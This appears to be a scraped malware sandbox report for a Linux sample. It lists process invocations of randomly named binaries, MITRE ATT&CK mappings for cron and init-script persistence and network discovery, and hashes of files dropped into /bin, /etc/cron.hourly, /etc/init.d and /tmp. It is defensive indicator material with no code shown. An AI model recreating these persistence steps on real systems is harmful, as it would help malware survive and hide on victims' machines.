/bin/amjbul -d 1517
1⤵
PID:1947

/bin/rdytpp
/bin/rdytpp -d 1517
1⤵
PID:1950

/bin/gragyk
/bin/gragyk -d 1517
1⤵
PID:1953

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Boot or Logon Autostart Execution

T1547

Boot or Logon Initialization Scripts

T1037

RC Scripts

T1037.004

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Boot or Logon Initialization Scripts

T1037

RC Scripts

T1037.004

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/bin/klsqzppvk

Filesize
549KB

MD5
3d876ee77ec61dbe6bdd84b9a7e6e171

SHA1
ed830f891a9925941679cf325da4d86ab31c6ad3

SHA256
b3d5c44115276a985137f5d89a1841b8e04d4edc1179bd17cd063c9fa25726b5

SHA512
22b0686c8706fd6813058ac28c864b6c3cc69c63079fcc7e50d7ed340da7506637efe532f5e047d66f752c74d465b31f05baf31e08c1d9763ddc9755e655294d

Download Submit
/bin/wnskpkym

Filesize
549KB

MD5
e2f6043d0d164b5c2955b05412445d94

SHA1
32bbe887b41182478650cc26753c15a9e2752cc1

SHA256
52c41a70f3491f84bbb83f1769df84a0c2919319069c6267ba096b9f0daaff56

SHA512
e55b89654d30887af7b76c0ffa062e954e3c2fe30194550542e66b1e89a360b52df0f71a9d93832adb0c84afdcd032a55638751dc68b1960fc73149959cf5841

Download Submit
/dev/shm/sem.BxtDAM

Filesize
16B

MD5
076933ff9904d1110d896e2c525e39e5

SHA1
4188442577fa77f25820d9b2d01cc446e30684ac

SHA256
4cbbd8ca5215b8d161aec181a74b694f4e24b001d5b081dc0030ed797a8973e0

SHA512
6fcee9a7b7a7b821d241c03c82377928bc6882e7a08c78a4221199bfa220cdc55212273018ee613317c8293bb8d1ce08d1e017508e94e06ab85a734c99c7cc34

Download Submit
/etc/cron.hourly/mykpksnw.sh

Filesize
145B

MD5
11171342e7b77ce1cced29118d3aa6b2

SHA1
5c6b0eb3cdb53400ffd59c69dd84e021af1c6563

SHA256
9fcdc68bafe985a52278488140245613dc6b3c0a2efac6cf2ac4b36910931106

SHA512
c80342cc540fbc4132411a5bfcb2c2ca79a03c592d08d6c9a7d6f0301ef677386bd560c918c045cba4b6ae95e36d9e6d9869fae8cca16a47c3d4fff34df55e1b

Download Submit
/etc/daemon.cfg

Filesize
32B

MD5
a6dd1f11b22072de2fd35ee0e088c421

SHA1
b09d82a64fd47dba7b495ff55af0d2f4053da1f1

SHA256
deefc75a2e1ad5844f472c9b490425e15227ca3092b29e75ce0148cd638ca0eb

SHA512
b56b236d90dc5a6b931f25bc7b319ccf6619f3ff0ece1c813e64b3c8d274aa919e33108b5ad3ea684dbd3f758d32d21aa3b4667add14794336d812c65a6adb2a

Download Submit
/etc/init.d/mykpksnw

Filesize
328B

MD5
f7deffca2bc9d1f243896e870d84ce05

SHA1
be0bbb939dbc4ac294ba41d6d1be62782acc2c94

SHA256
4ed7c7a8b222c37bc945e59073dfe41a036403b2687593f514336c977a808b18

SHA512
ebbaaab28e31a375b4a8d78dd160f333d46993d77467486ddc6479d1e270294afe94dedebc045aaa4011286d47daea971a6f167de33db846d1b5a005120436e0

Download Submit
/tmp/112

Filesize
549KB

MD5
f9191bab1e834d4aef3380700639cee9

SHA1
9c20269df6694260a24ac783de2e30d627a6928a

SHA256
ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73

SHA512
3d2758fe2d06183e627b5cc24919c08c84108f2efd7ab0a162029d55537476410d9535d50f3eb059f7153f7482c134284862eea121201f82838aace4b12283b5

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads